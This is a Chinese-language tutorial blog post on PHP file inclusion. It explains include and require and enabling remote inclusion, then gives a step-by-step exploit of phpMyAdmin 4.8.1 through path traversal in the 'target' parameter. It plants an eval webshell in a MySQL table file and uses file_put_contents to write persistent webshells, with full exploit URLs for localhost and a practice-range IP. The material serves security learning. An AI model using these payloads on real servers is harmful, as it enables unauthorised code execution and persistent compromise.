美文网首页
超详细本地文件包含漏洞详解(小白也能懂!)

超详细本地文件包含漏洞详解(小白也能懂!)

作者: 网络安全自修室 | 来源:发表于2022-06-19 22:29 被阅读0次

为了防止代码重复,我们就有了,文件包含。很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避免了每个网页又去重复造轮子。




在index.php文件里包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。

如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,然是不影响其他功能的执行,比如这里的nf和123的输出。

那么就表明include函数,如果出现错误的话,并不会影响其他功能的运行。

如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,影响后面功能的执行,比如这里的nf的输出,后面的功能因为2.txt报错,导致123未执行。

那么就表明require函数,如果出现错误的话,会影响后面功能的运行。


只要文件内是php代码,文件包含是不在意文件后缀的。



12345.jpg的传参值是a,

那么我们可以

 写传参值=file_put_contents(‘8.php’,’<?php eval($_REQUEST[a]);?>’)

然后生成一个新的php文件

访问index.php


以上我们接触的全部是本地文件包含

远程文件包含

简单来说远程文件包含,就是可以包含其他主机上的文件,并当成php代码执行。
要实现远程文件包含的话,
php配置的 php配置的allow_url_include = on必须为on(开启)

来我们可以来实验一下,把这个配置打开。

“其他选项菜单”——“打开配置文件”——“php-ini”

打开配置文件,搜索allow_url_include 把Off改为On,注:第一个字母要为大写


之后要重启才能生效。



配置开启后,我们来远程文件包含一下,我们来远程包含一下kali上的1.txt,可以看到没有本地包含,所以直接显示的内容。



那我们现在来远程包含一下kali的这个1.txt,看会不会有phpinfo,注意我这里是index文件哦,所以是默认的。


可以看到,包含成功!


这里可以插一句题外话,如果是window服务器的话,可以让本地文件包含变成远程文件包含。需要开始XX配置,SMB服务。



这里我们可以发现,进入一个不存在的目录,然后再返回上一级,相当于没变目录位置,这个是不影响的,而且这个不存在的目录随便怎么写都可以。

但是php是非常严格的,进入一个不存在的目录,这里目录的名字里不能有?*号,否则报错,然后再返回上一级,相当于没变目录位置,这个是不影响的,而且这个不存在的目录随便怎么写都可以。

实战

注意,这里php版本过低,会安装不上


安装好后,我们来解析下源码


1.txt内容phpinfo()


来本地文件包含一下,发现成功

http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/../11.txt

靶场实战

先创建一个库名:nf


接着创建表:ff,字段数选2个就行了


然后选中我们之前创建好的库名和表名,开始写入数据,第一个就写个一句话木马,第二个随便填充。

然后我们找到存放表的路径。


这里我们要传参2个,那么就加上&这里我们找到之后传参phpinfo

http://59.63.200.79:8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/…/phpstudy/mysql/data/nf/ff.frm&a=phpinfo();

因为a在ff.frm里

<?php eval($_REQUEST[a])?>
//注意,这里面没有分号和单引号

文件包含

用file_put_contents(‘8.php’,’<?php eval($_REQUEST[a]);?>’)写入一句话木马

URL地址如下:

http://59.63.200.79:8010/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/…/phpstudy/mysql/data/nf/ff.frm`&`a=file_put_contents(‘8.php’,’<?php eval($_REQUEST[a])?>’);

写入成功后,我们连接这个8.php的木马

在线测试时这样,但是我在本地测试的时候,还是有点不一样的。我就直接上不一样的地方,前面的地方都是一样的

  1. 创建一个库为yingqian1984,
  2. 创建一个表为yq1984
  3. 填充表数据,因为跟上面一样,2个字段一个木马,一个随便数据
  4. 找数据表的位置,最后我发现我的MySQL存放数据库的地方是在
    C:\ProgramData\MySQL\MySQL Server 5.7\Data\yingqian1984

文件包含成功

http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/ProgramData/MySQL/MySQL Server 5.7/Data/yingqian1984/qy1984.frm&a=phpinfo();

用file_put_contents(‘9.php’,’<?php eval($_REQUEST[a]);?>’)写入一句话木马

http://127.0.0.1/phpmyadmin/phpMyAdmin-4.8.1-all-languages/index.php?target=db_sql.php%253f/…/…/…/…/ProgramData/MySQL/MySQL Server 5.7/Data/yingqian1984/qy1984.frm&a=file_put_contents(‘9.php’,’<?php eval($_REQUEST[a])?>’);

* <?php eval($_REQUEST[a])?>注意,这里面没有分号和单引号*

传参成功

本文由mdnice多平台发布

相关文章

  • 超详细本地文件包含漏洞详解(小白也能懂!)

    为了防止代码重复,我们就有了,文件包含。很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避...

  • php安全

    文件包含漏洞** 本地文件包含**能打开并包含本地文件的漏洞,被称为本地文件包含漏洞(LFI)%00截断,php内...

  • 文件包含漏洞详解

    http://tieba.baidu.com/p/2310282657 什么是”远程文件包含漏洞”?服务器通过ph...

  • phpMyAdmin本地文件包含漏洞

    0x00 漏洞概述 受此漏洞影响的版本: phpMyAdmin 4.0.1 -- 4.2.12 phpMyAdmi...

  • 文件包含漏洞 Files Inclusion

    from https://www.ichunqiu.com/course/63887 文件包含漏洞概述 本地文件包...

  • 文件包含漏洞实验详解

    参考《白帽子讲web安全》,实验心得: 想要成功利用文件包含的漏洞,需要满足两个条件 (1)include()等函...

  • 文件包含

    如何侵入系统 1 程序通过【包含函数】调用本地或远程文件,来实现漏洞上传。2 被包含的文件是各种格式,文件中可能就...

  • CVE-2020-1938漏洞复现

    Apache Tomcat服务器存在文件包含漏洞(CVE-2020-1938) 详细描述 Apache Tomca...

  • 关于PHP文件包含

    菜鸡随笔 本地文件包含漏洞基础看这里:http://www.freebuf.com/column/148886.h...

  • 网络安全之文件包含漏洞总结

    介绍 文件包含漏洞属于代码注入漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直...

网友评论

      本文标题:超详细本地文件包含漏洞详解(小白也能懂!)

      本文链接:https://www.haomeiwen.com/subject/fcldvrtx.html